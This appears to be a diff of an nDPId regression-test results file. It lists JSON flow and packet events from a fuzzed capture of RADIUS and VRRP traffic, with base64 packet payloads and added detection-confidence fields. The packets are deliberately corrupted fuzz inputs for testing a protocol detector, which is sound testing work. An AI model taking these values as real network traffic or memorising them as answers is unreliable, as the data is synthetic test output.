+00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":255,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528998009111,"flow_last_seen":1528998009111,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"ts_msec":1528998226495,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"65.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":255,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997833703,"flow_last_seen":1528997833703,"flow_idle_time":180000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":164,"midstream":0,"ts_msec":1528998226495,"l3_proto":"ip4","src_ip":"198.52.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":255,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997833437,"flow_last_seen":1528997833437,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"ts_msec":1528998226495,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.48.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
 00558{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":255,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997764910,"flow_last_seen":1528997764910,"flow_idle_time":600000,"flow_min_l4_payload_len":663,"flow_max_l4_payload_len":663,"flow_tot_l4_payload_len":663,"flow_avg_l4_payload_len":663,"midstream":0,"ts_msec":1528998226495,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","l4_proto":0,"flow_datalink":1,"flow_max_packets":3}
 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":255,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998226495,"flow_last_seen":1528998226495,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"ts_msec":1528998226495,"l3_proto":"ip4","src_ip":"10.12.82.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01385{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":255,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":1,"flow_last_seen":1528998226495,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":745,"pkt_l4_len":711,"ts_msec":1528998226495,"pkt":"AAAMB6xAABRP+4rqCABFAALbITxAAP8RAAAKDFIexuIZNXIQBxQCxwAAAYoCv\/zOwB93ue+XnMHxJmANBSoaCgAAV8gOBFVTGgwAAFfIDQZ3aWZplw8AAFfICQlXSVNQUjEwGgkAADghDQMyNwZbIqlSATUwMzExNDgwMDczNjM4MDcyQHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TZjAtNzktNjAtZDEtN2QtMzceJTAwLWE3LTQyLWQwLWUwLTAwOlZlcml6b25XaUZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpdC1zZXNzaW9uLWlkPTEwZmYxMGFjMDAwMDAwY2U1MmE5MjI1YiwgNWIyMmE5NTIvZjA6N286NjA6ZDE6N2Q6M0EvMjOBBAasFAEQIA5WWldDMlRlc3RMYWIaDAAAN2MBBgAAAAIGBgAAAAIMBgAABRQ9BgAAABNABgAAAA1BBgAAAAZRBDU2TzoCCQA4ATAzMTE0ODAwNzM2MzgwNzJAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZxoUAABXyAcOVlpXQzJUZXN0TGFiGgoAAFfICARFVBoQAABXyAoKU3S3bmRhcmQaEAAAV8gLClRlc3QgTGFiGgkAAFfIDwMxGgoAAFfIEAROShoRAABXyBELTHluZGh1cnN0GgwAAFfIEgYAAADJGhcAAFfIHRFWWlcgQzIgVGVzdCCSYWIaCwAAV8glBVZ6VxoNAAA4IQ4HMDcwNzEaDAAAOCERBgAAAAAaFQAAOCESD0ludmFsaWQgVmFsdWUaHQAAOCETFzQwLjgwNDg4Mk4tNzQuMTAyODM5VxoMAAA4IRQGAAABAhoMAAA4IRUGAAAAAv4VAAA4IRYPU3RhZGl1bURpcmVjdBoMAAAFg2kGwFBKmVAShzmsVPaY1NdsDR28hGUq6w=="}
-00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":255,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998226495,"flow_last_seen":1528998226495,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"ts_msec":1528998226495,"l3_proto":"ip4","src_ip":"10.12.82.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":255,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998226495,"flow_last_seen":1528998226495,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"ts_msec":1528998226495,"l3_proto":"ip4","src_ip":"10.12.82.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":256,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998226700,"flow_last_seen":1528998226700,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"ts_msec":1528998226700,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.66","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00708{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":256,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":1,"flow_last_seen":1528998226700,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":239,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":239,"pkt_l4_len":205,"ts_msec":1528998226700,"pkt":"AGRP+4rqcNuYVcUnCABFAADhCw9AAPwRSLvG4hk1CgxAQgcUchAAzUSUJQAAxU7iei8YAqXgQzF8ViRYUTYBNTAzMTE0ODAwNzM2UzgwNzJAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXSqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="}
 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":257,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998226997,"flow_last_seen":1528998226997,"flow_idle_time":180000,"flow_min_l4_payload_len":683,"flow_max_l4_payload_len":683,"flow_tot_l4_payload_len":683,"flow_avg_l4_payload_len":683,"midstream":0,"ts_msec":1528998226997,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01357{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":257,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":1,"flow_last_seen":1528998226997,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":725,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":725,"pkt_l4_len":691,"ts_msec":1528998226997,"pkt":"AAAMB6xAABRP+4rqCABFAALHIT1AAP8RAAAKDEAexuIZNXIQBxQCswAAAYsCq4xQPdxKF37r8KxIm1PDRJ0aCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFclAAlXSVNQUjEwGgkAADghDQMyNwZbIqlSATUwMzExNDgwMDczNjM4MDd0QHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmVKd29yay5vdmdZAxB+CDFjaXNjb4MGAAAAAR8TZjAtNzktNjAtZDEtN2QtMzceJTAwLWE3LTQyLWQwLWUwLTAwOlZlcml6Cm5XaUZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpdC1zZXNzaW9uLWlkPTEwZmYxMGFjMDAwMDAwY2U1MmE5MhI1YiwgNWIyMmE5NTIvZjA6Nzk7NjA6ZDE6N2Q6MzcvMjM3BAasFAEQIA5WWldDMlRlc3RMYWIaDAAAN2MBBgAAAAIGBgAAAAIMBgAABRQ9BgAAABNABgAAAA1BBgAAAAZRBTU2TyYCAgAkFwEAAAsFAAAF0b83OvFEpN\/GJ8iacHs0AwIAIKNuNJ8aFAAAV8gHDlZaV0MyVGVzdExhYhoKAABXyAgERVQaEAAAV8gKClN0YW5kYXJkGhAAAFfICwpUZXN0IExhYhoJAABXyA8DMRoKAABXyBAETkoaEQAAV8gRC0x5bmRodXJzdBoMAABXyBIGAAAAyRoXAABXyB0RVlpXIEMyIFRlc3QgTGFiGgsAAFfInwVWelcaDQAAOCEOBzA3fDcxGgwAADghEQYAAAAAGhUAADghEg9JbnZhbGlkIFZhbHVlGh0AADghExc0MC44MDQ4ODJOLTc0LjEwMjgzOVcaDAAAOCEUBgAAAQIaDAAAOCEVBgBQAEUaFQAAOCEWD1N0YWRpdW1EaXJlY3QaDAAABYMHBsBQSplQEgKSi3SeRtM1yCnU8gbNix8="}
-00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":257,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998226997,"flow_last_seen":1528998226997,"flow_idle_time":180000,"flow_min_l4_payload_len":683,"flow_max_l4_payload_len":683,"flow_tot_l4_payload_len":683,"flow_avg_l4_payload_len":683,"midstream":0,"ts_msec":1528998226997,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":257,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998226997,"flow_last_seen":1528998226997,"flow_idle_time":180000,"flow_min_l4_payload_len":683,"flow_max_l4_payload_len":683,"flow_tot_l4_payload_len":683,"flow_avg_l4_payload_len":683,"midstream":0,"ts_msec":1528998226997,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
 01385{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":258,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":2,"flow_last_seen":1528998234974,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":745,"pkt_l4_len":711,"ts_msec":1528998234974,"pkt":"AAAMB6xAABRP+4rqCABFAALbIT5AAP8RAAAKDEAexuIZNXIQBxQCxwAAAYwCv2WunRMymjwNfd2mJ\/4navgaCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUzEwGgkAADghDQMzNwZbIqlaATUwMzExNDgwMjgxNTAxNTg5QHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TZTAtNWYtNDUtOTAtMDktNWYeJTAwLWE3LTQyLWQwLWUwLTAwOlZlcml6b25XaUZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpdC1zZXNzaW9uLWlkPTEwZmYxMGFjMDAwMDAwY2Y1YWE5MjI1YiwgNWIyMmE5NWEvZTA6NWY6NDU6OTA6MDk6NWYvMjM4BAasFAEQIA5WWulDMlRlc3RMYWIaDAAAN2MBBgAAAAIGBgAAAAIMBgAABRQ9BgAAABNABgAAAA1BBgAAAAZRBDU2TzoCAQA4ATAzMTE0ODAyODE1MDE1ODlAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9ydxoUAABXyAcOVlpXQzJUZXN0TGFiGgoAAFfICARFVBoQAABXyAoKU3RhbmRhcmQaEAAAV8gLClRlc3QgTGFiGgkAAFfIDwMxGgoAAFfIEAROShoRAABXyBELTHluZGh1cnN0GgwAAFfIEgYAAADJGhcAAFfIHRFWWlcgQzIgVGVzdCBMYWIaCwAAV8glBVZ6VxoNAABmIQ4HMDcwNzEaDAAAOCERBgAAAAAaFQAAOCESD0ludmFsaWQgVmFsdWUaHQAAOCETFzQwLjgwJQA4Mk4tNzQuMTAyODM5VxoMAAA4IRQGAAABAhoMAAA4IRUGAAAAAhoVAAA4IRYPU3RhZGl1bURpcmVjdBoMAAAFgwcGwFBKmVASsw7VNY05Fzmt2Iq0siTG9A=="}
 00629{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":259,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":3,"flow_last_seen":1528998235042,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"ts_msec":1528998235042,"pkt":"ABRP+4rqcNt9VcUnCABFAAClCyBAAPwRSObG4hk1CgxAHgcUchAAkQ5nC4wAieszlNOZQN5atVHOdz1I6FIBNTAzMTE0ODAyODE1MDE1ODlAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmE5NWEvZTA6NWY6NDU6OTA6MDk6NWYvMjM4Tw4BAAAMFwwAAAwBf\/xQEiPOi+SH+clCCaExIWjk4bU="}
-00629{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":262,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997632285,"flow_last_seen":1528997632285,"flow_idle_time":600000,"flow_min_l4_payload_len":691,"flow_max_l4_payload_len":691,"flow_tot_l4_payload_len":691,"flow_avg_l4_payload_len":691,"midstream":0,"ts_msec":1528998238552,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","l4_proto":112,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"VRRP","breed":"Acceptable","category":"Network"}}
+00655{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":262,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997632285,"flow_last_seen":1528997632285,"flow_idle_time":600000,"flow_min_l4_payload_len":691,"flow_max_l4_payload_len":691,"flow_tot_l4_payload_len":691,"flow_avg_l4_payload_len":691,"midstream":0,"ts_msec":1528998238552,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","l4_proto":112,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"VRRP","breed":"Acceptable","category":"Network"}}
 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":264,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998238764,"flow_last_seen":1528998238764,"flow_idle_time":180000,"flow_min_l4_payload_len":655,"flow_max_l4_payload_len":655,"flow_tot_l4_payload_len":655,"flow_avg_l4_payload_len":655,"midstream":0,"ts_msec":1528998238764,"l3_proto":"ip4","src_ip":"88.12.80.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01321{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":264,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":1,"flow_last_seen":1528998238764,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":697,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":697,"pkt_l4_len":663,"ts_msec":1528998238764,"pkt":"AAAMB6xAABRP+4rqCABFAAKrIUFAAP8RAABYDFAexuIZNXIQBxQClwAAAY8CjztV4Oh\/RVHKhHSmtgpLCVwaCgAAV8gODFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGgkAADghDQMzNwZbIqleATUwMzExNDgwMjgxNTAxNTg5QHdsYW4ubW5jNDgwLm1jYzMxMS4zMXBwbmV0d29yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TZTAtNWYtNDUtOTAtMDktNWYeJTAwLWE3LTQyLWQwLWUwLTAwOlZlcml6b25XaUZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpdC1zZXNzaW9uLWlkPTEwZmYxMGFjMDAwMDAwY2Y1bWE5Muo1YiwgNWIyMmE5NWEvZTA6NWY6NDU6OTA6MDk6NWYvMjM4BAasOgEQIA5WWldDMlRlc3RMYWIaDAAAN2MBBgAAAAIGBgAAAAIMBgAABRQ9BgAAABNABgAAAA1PBgAAAAZRBDU2TwoCAAAIFwwAABoUAABXyAcOVlpXQzJUZXN0TGFiGgoAAFfICARFVBoQAABXyAoKU3RhLmRhcmQaEAAAV8gLClRlc3QgTGFiGgkAAFfIDwMxGgoAAFfIEAROShoRAABXyBELTHluZGh1cnN0GgwAAFfIEgYAAADJGhcAAFfIHRFWWlcgQzIgVGVzdCBMYWIaCwAAV8glBVZ6VxoNAAA4IQ4HMDcwNzEaDAAAOCERBgAAAAAaFQAAOCESj0ludmFszGQgVmFsdWUawgAAOCETFzQwLjgwNDg4Mk4tNzQuMTAyODM5VxoMAAA4IRQGAAABAhoMAAA5IRUGAAAAAhoVAAA4IRYPU3RhZGl1bURpcmVjdBoMAAAFgwcGwFBKmVASxHIw401BJN8oimEroWhW+Q=="}
-00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":264,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998238764,"flow_last_seen":1528998238764,"flow_idle_time":180000,"flow_min_l4_payload_len":655,"flow_max_l4_payload_len":655,"flow_tot_l4_payload_len":655,"flow_avg_l4_payload_len":655,"midstream":0,"ts_msec":1528998238764,"l3_proto":"ip4","src_ip":"88.12.80.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":264,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998238764,"flow_last_seen":1528998238764,"flow_idle_time":180000,"flow_min_l4_payload_len":655,"flow_max_l4_payload_len":655,"flow_tot_l4_payload_len":655,"flow_avg_l4_payload_len":655,"midstream":0,"ts_msec":1528998238764,"l3_proto":"ip4","src_ip":"88.12.80.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":274,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998257171,"flow_last_seen":1528998257171,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"ts_msec":1528998257171,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.62","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01385{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":274,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":1,"flow_last_seen":1528998257171,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":745,"pkt_l4_len":711,"ts_msec":1528998257171,"pkt":"AAAMB6xAABRP+4rqCABFAALbtPNAAP8RAAAKDEAexuIZPnIQBxQCxwAAAZQCv\/QjF2fWlNBdxlblaWkTeyMaCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGgkAADghDQM1NwZbIqlxATUwMzExNDgwMjgxNTAxNTg5QHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TZTAtNWYtNDUtOTAtMDktNWYeJTAwLWE3LTQyLWQwLWUwLTAwOlZlcml6b25XaUZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpdC1zZXNzaW9uLWlkPTEwZmYxMGFjMDAwMDAwY2Y1YWE5MjI1YiwgNWIyMmE5NWEvZTA6NWY6NDU6OTA6MDk6NWYvMjM4BAasFAEQIA5WWldDMlRlc3RMYWIaDAAAN2MBBgAAAAIGBgAAAAIMBgAABRQ9BgAAABNABgAAAA1BBgAAAAZRBDU2bzoCAQA4ATAzMTE0ODAyODE1MDE1ODlAd2xhbi5tbmM0ODAlAEZjMzExLjNncHBuZXR3b3JrLm9yZxoUAABXyAcOVlpXQzJUZXN0TGFiGgoAAFfICARFVBoQAABXyAoKU3RhbmRhcmQaEAAAV8gLClRlc3QgTGFiGgkAAFfIDwMxGmwAAFfIEAROShoRAABXyE0LTHluZGh1cnN0GgwAAFfIEgYAAAjJGhcAAFfIHRFWWlcgQzIgVGVzdCBMYWIaCwAAV8glBVZ6VxoNAAA4IQ4HMDcwNjEaDAAAOCERBgAAAEIaFQAAOCESD0ludmFsaWQgVmFsdWUaHQAAOCFMFzQwLjgwNDg4Mk4tN3kuxzAyODM5VxoMAAA4IRQGAAABAhoMAAA4IRUGAAAAAhoVAAA4IRYPU3RhZGl1bURpcmVjdBoMAAAFgwcGwFBKmVAS4SWykyhQ3NEVyrk907GZpA=="}
-00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":274,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998257171,"flow_last_seen":1528998257171,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"ts_msec":1528998257171,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.62","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":274,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998257171,"flow_last_seen":1528998257171,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"ts_msec":1528998257171,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.62","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
 00629{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":275,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":2,"flow_last_seen":1528998257238,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"ts_msec":1528998257238,"pkt":"ABRP+4rqcNuYVcUnCABFAAClC51AAPwRSGDG4hk+CgxAHgcUchAAkfysC5QAiW3tOcJvsUMExQ3khIQf5JsBNTAzMTE0ODAyODE1MDE1ODlAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmE5NWEvZTA6NWY6NDU6OTA6MAI6NWYvMjM4Tw4BAAAMFwwAAAwBf\/xQEttbuyUYSqflHrLDivPrVrc="}
 01226{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":276,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":697,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":697,"pkt_l4_len":0,"ts_msec":1528998257392,"pkt":"AAAMB6xAABRP+4rqCABFAAKrtPRAZP8RAAAKLEAexuIZPnIQBxQClwAAAZUCj2QnnzQfo5ejlXtjb\/umlWwaCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGgkAADghDQM1NwZbIqlxATUwMzExNDgwMjgxNTAxNTg5QHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmdZAxB+CDFjaXNib4OUAAAAAR8TZTAtNWYtNDUtOTAtMDktNWYeJTAwLWE3LTQyLWQwLWUwLTEwOlZlcml6b25XaTZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpdC1zZXOqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="}
 00201{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":276,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","l4_data_len":663}
@@ -428,10 +428,10 @@
